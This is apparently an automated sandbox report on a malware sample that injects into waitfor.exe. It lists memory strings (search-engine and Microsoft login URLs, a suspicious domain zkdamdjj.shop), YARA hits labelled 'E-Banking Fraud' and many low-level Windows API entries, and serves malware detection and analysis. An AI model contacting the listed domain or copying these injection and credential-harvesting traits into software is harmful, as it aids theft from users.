                 Source: iBkWOgpZKSoi.exe, 00000008.00000002.3816364731.0000000004E43000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.zkdamdjj.shop
                 Source: iBkWOgpZKSoi.exe, 00000008.00000002.3816364731.0000000004E43000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.zkdamdjj.shop/swhs/
                 Source: waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                 Source: waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdn.consentmanager.net
                 Source: waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                 Source: waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                 Source: waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                 Source: waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://delivery.consentmanager.net
                 Source: waitfor.exe, 00000007.00000002.3815889613.000000000571A000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.000000000322A000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://down-sz.trafficmanager.net/?hh=
                 Source: iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://dts.gnpge.com
                 Source: waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                 Source: waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                 Source: waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                 Source: waitfor.exe, 00000007.00000002.3803338370.0000000002B68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                 Source: waitfor.exe, 00000007.00000002.3803338370.0000000002B68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                 Source: waitfor.exe, 00000007.00000002.3803338370.0000000002B46000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld211
                 Source: waitfor.exe, 00000007.00000002.3803338370.0000000002B68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                 Source: waitfor.exe, 00000007.00000002.3803338370.0000000002B5B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                 Source: waitfor.exe, 00000007.00000002.3803338370.0000000002B68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                 Source: waitfor.exe, 00000007.00000002.3803338370.0000000002B68000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                 Source: waitfor.exe, 00000007.00000003.1826248532.0000000007A42000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                 Source: waitfor.exe, 00000007.00000002.3813572544.00000000044F1000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000000.1710385375.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1949830012.0000000001B1C000.00000004.80000000.00040000.00000000.sdmp, suBpo1g13Q.exe | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                 Source: waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                 Source: waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.register.com/whois.rcmx?domainName=Jcsa.info

                E-Banking Fraud

                Source: Yara match | File source: 4.2.suBpo1g13Q.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 4.2.suBpo1g13Q.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1637335809.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3813776931.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3813875432.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3813882427.00000000022E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000004.00000002.1638525330.00000000017C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0042CFC3 NtClose | 4_2_0042CFC3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0040AE71 NtResumeThread | 4_2_0040AE71
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2B60 NtClose,LdrInitializeThunk | 4_2_014E2B60
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2DF0 NtQuerySystemInformation,LdrInitializeThunk | 4_2_014E2DF0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2C70 NtFreeVirtualMemory,LdrInitializeThunk | 4_2_014E2C70
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E35C0 NtCreateMutant,LdrInitializeThunk | 4_2_014E35C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E4340 NtSetContextThread | 4_2_014E4340
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E4650 NtSuspendThread | 4_2_014E4650
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2BE0 NtQueryValueKey | 4_2_014E2BE0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2BF0 NtAllocateVirtualMemory | 4_2_014E2BF0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2B80 NtQueryInformationFile | 4_2_014E2B80
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2BA0 NtEnumerateValueKey | 4_2_014E2BA0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2AD0 NtReadFile | 4_2_014E2AD0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2AF0 NtWriteFile | 4_2_014E2AF0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2AB0 NtWaitForSingleObject | 4_2_014E2AB0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2D00 NtSetInformationFile | 4_2_014E2D00
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2D10 NtMapViewOfSection | 4_2_014E2D10
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2D30 NtUnmapViewOfSection | 4_2_014E2D30
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2DD0 NtDelayExecution | 4_2_014E2DD0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2DB0 NtEnumerateKey | 4_2_014E2DB0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2C60 NtCreateKey | 4_2_014E2C60
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2C00 NtQueryInformationProcess | 4_2_014E2C00
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2CC0 NtQueryVirtualMemory | 4_2_014E2CC0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2CF0 NtOpenProcess | 4_2_014E2CF0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2CA0 NtQueryInformationToken | 4_2_014E2CA0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2F60 NtCreateProcessEx | 4_2_014E2F60
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2F30 NtCreateSection | 4_2_014E2F30
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2FE0 NtCreateFile | 4_2_014E2FE0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2F90 NtProtectVirtualMemory | 4_2_014E2F90
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2FA0 NtQuerySection | 4_2_014E2FA0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2FB0 NtResumeThread | 4_2_014E2FB0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2E30 NtWriteVirtualMemory | 4_2_014E2E30
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2EE0 NtQueueApcThread | 4_2_014E2EE0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2E80 NtReadVirtualMemory | 4_2_014E2E80
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E2EA0 NtAdjustPrivilegesToken | 4_2_014E2EA0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E3010 NtOpenDirectoryObject | 4_2_014E3010
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E3090 NtSetValueKey | 4_2_014E3090
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E39B0 NtGetContextThread | 4_2_014E39B0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E3D70 NtOpenThread | 4_2_014E3D70
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E3D10 NtOpenProcessToken | 4_2_014E3D10
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D4650 NtSuspendThread,LdrInitializeThunk | 7_2_047D4650
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D4340 NtSetContextThread,LdrInitializeThunk | 7_2_047D4340
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2C70 NtFreeVirtualMemory,LdrInitializeThunk | 7_2_047D2C70
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2C60 NtCreateKey,LdrInitializeThunk | 7_2_047D2C60
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2CA0 NtQueryInformationToken,LdrInitializeThunk | 7_2_047D2CA0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2D30 NtUnmapViewOfSection,LdrInitializeThunk | 7_2_047D2D30
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2D10 NtMapViewOfSection,LdrInitializeThunk | 7_2_047D2D10
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2DF0 NtQuerySystemInformation,LdrInitializeThunk | 7_2_047D2DF0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2DD0 NtDelayExecution,LdrInitializeThunk | 7_2_047D2DD0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2EE0 NtQueueApcThread,LdrInitializeThunk | 7_2_047D2EE0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2E80 NtReadVirtualMemory,LdrInitializeThunk | 7_2_047D2E80
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2F30 NtCreateSection,LdrInitializeThunk | 7_2_047D2F30
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2FE0 NtCreateFile,LdrInitializeThunk | 7_2_047D2FE0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2FB0 NtResumeThread,LdrInitializeThunk | 7_2_047D2FB0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2AF0 NtWriteFile,LdrInitializeThunk | 7_2_047D2AF0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2AD0 NtReadFile,LdrInitializeThunk | 7_2_047D2AD0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2B60 NtClose,LdrInitializeThunk | 7_2_047D2B60
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk | 7_2_047D2BF0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2BE0 NtQueryValueKey,LdrInitializeThunk | 7_2_047D2BE0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2BA0 NtEnumerateValueKey,LdrInitializeThunk | 7_2_047D2BA0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D35C0 NtCreateMutant,LdrInitializeThunk | 7_2_047D35C0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D39B0 NtGetContextThread,LdrInitializeThunk | 7_2_047D39B0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2C00 NtQueryInformationProcess | 7_2_047D2C00
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2CF0 NtOpenProcess | 7_2_047D2CF0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2CC0 NtQueryVirtualMemory | 7_2_047D2CC0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2D00 NtSetInformationFile | 7_2_047D2D00
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2DB0 NtEnumerateKey | 7_2_047D2DB0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2E30 NtWriteVirtualMemory | 7_2_047D2E30
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2EA0 NtAdjustPrivilegesToken | 7_2_047D2EA0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2F60 NtCreateProcessEx | 7_2_047D2F60
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2FA0 NtQuerySection | 7_2_047D2FA0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2F90 NtProtectVirtualMemory | 7_2_047D2F90
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2AB0 NtWaitForSingleObject | 7_2_047D2AB0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D2B80 NtQueryInformationFile | 7_2_047D2B80
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D3010 NtOpenDirectoryObject | 7_2_047D3010
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D3090 NtSetValueKey | 7_2_047D3090
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D3D70 NtOpenThread | 7_2_047D3D70
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_047D3D10 NtOpenProcessToken | 7_2_047D3D10
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_00839750 NtCreateFile | 7_2_00839750
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_008398B0 NtReadFile | 7_2_008398B0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_008399A0 NtDeleteFile | 7_2_008399A0
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_00839A40 NtClose | 7_2_00839A40
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_00839B90 NtAllocateVirtualMemory | 7_2_00839B90
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04ABF1F6 NtQueryInformationProcess | 7_2_04ABF1F6
                Source: C:\Windows\SysWOW64\waitfor.exe | Code function: 7_2_04ABF9CB NtUnmapViewOfSection | 7_2_04ABF9CB
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 0_2_0296D584 | 0_2_0296D584
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 0_2_071DD500 | 0_2_071DD500
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 0_2_071DB428 | 0_2_071DB428
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 0_2_071DD4F0 | 0_2_071DD4F0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 0_2_071DAFF0 | 0_2_071DAFF0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 0_2_071DCC18 | 0_2_071DCC18
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 0_2_071DCC28 | 0_2_071DCC28
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 0_2_071DABB8 | 0_2_071DABB8
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_00418ED3 | 4_2_00418ED3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_004170DE | 4_2_004170DE
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_004170E3 | 4_2_004170E3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0040E903 | 4_2_0040E903
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_00410913 | 4_2_00410913
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_00404924 | 4_2_00404924
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_004011F0 | 4_2_004011F0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0040EA47 | 4_2_0040EA47
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0040EA53 | 4_2_0040EA53
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_00403300 | 4_2_00403300
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_00401CC0 | 4_2_00401CC0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_00401CB9 | 4_2_00401CB9
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0042F5C3 | 4_2_0042F5C3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_00401E20 | 4_2_00401E20
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_00402623 | 4_2_00402623
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_00402630 | 4_2_00402630
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_004106ED | 4_2_004106ED
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_004106F3 | 4_2_004106F3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01538158 | 4_2_01538158
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014A0100 | 4_2_014A0100
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0154A118 | 4_2_0154A118
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_015681CC | 4_2_015681CC
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_015641A2 | 4_2_015641A2
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_015701AA | 4_2_015701AA
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01542000 | 4_2_01542000
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0156A352 | 4_2_0156A352
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_015703E6 | 4_2_015703E6
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014BE3F0 | 4_2_014BE3F0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01550274 | 4_2_01550274
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_015302C0 | 4_2_015302C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014B0535 | 4_2_014B0535
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01570591 | 4_2_01570591
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01562446 | 4_2_01562446
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01554420 | 4_2_01554420
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0155E4F6 | 4_2_0155E4F6
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014D4750 | 4_2_014D4750
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014B0770 | 4_2_014B0770
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014AC7C0 | 4_2_014AC7C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014CC6E0 | 4_2_014CC6E0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014C6962 | 4_2_014C6962
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014B29A0 | 4_2_014B29A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0157A9A6 | 4_2_0157A9A6
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014BA840 | 4_2_014BA840
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014B2840 | 4_2_014B2840
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014DE8F0 | 4_2_014DE8F0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014968B8 | 4_2_014968B8
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0156AB40 | 4_2_0156AB40
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01566BD7 | 4_2_01566BD7
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014AEA80 | 4_2_014AEA80
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014BAD00 | 4_2_014BAD00
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0154CD1F | 4_2_0154CD1F
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014AADE0 | 4_2_014AADE0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014C8DBF | 4_2_014C8DBF
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014B0C00 | 4_2_014B0C00
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014A0CF2 | 4_2_014A0CF2
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01550CB5 | 4_2_01550CB5
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01524F40 | 4_2_01524F40
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01552F30 | 4_2_01552F30
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014F2F28 | 4_2_014F2F28
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014D0F30 | 4_2_014D0F30
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014A2FC8 | 4_2_014A2FC8
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014BCFE0 | 4_2_014BCFE0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0152EFA0 | 4_2_0152EFA0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014B0E59 | 4_2_014B0E59
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0156EE26 | 4_2_0156EE26
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0156EEDB | 4_2_0156EEDB
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0156CE93 | 4_2_0156CE93
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014C2E90 | 4_2_014C2E90
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014E516C | 4_2_014E516C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0149F172 | 4_2_0149F172
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0157B16B | 4_2_0157B16B
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014BB1B0 | 4_2_014BB1B0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014B70C0 | 4_2_014B70C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0155F0CC | 4_2_0155F0CC
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0156F0E0 | 4_2_0156F0E0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_015670E9 | 4_2_015670E9
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0149D34C | 4_2_0149D34C
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0156132D | 4_2_0156132D
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014F739A | 4_2_014F739A
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014CB2C0 | 4_2_014CB2C0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_015512ED | 4_2_015512ED
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014B52A0 | 4_2_014B52A0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01567571 | 4_2_01567571
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_015795C3 | 4_2_015795C3
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0154D5B0 | 4_2_0154D5B0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014A1460 | 4_2_014A1460
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0156F43F | 4_2_0156F43F
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014A17EC | 4_2_014A17EC
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0156F7B0 | 4_2_0156F7B0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014F5630 | 4_2_014F5630
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_015616CC | 4_2_015616CC
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014B9950 | 4_2_014B9950
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014CB950 | 4_2_014CB950
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_01545910 | 4_2_01545910
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0151D800 | 4_2_0151D800
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_014B38E0 | 4_2_014B38E0
                Source: C:\Users\user\Desktop\suBpo1g13Q.exe | Code function: 4_2_0156FB76 | 4_2_0156FB76
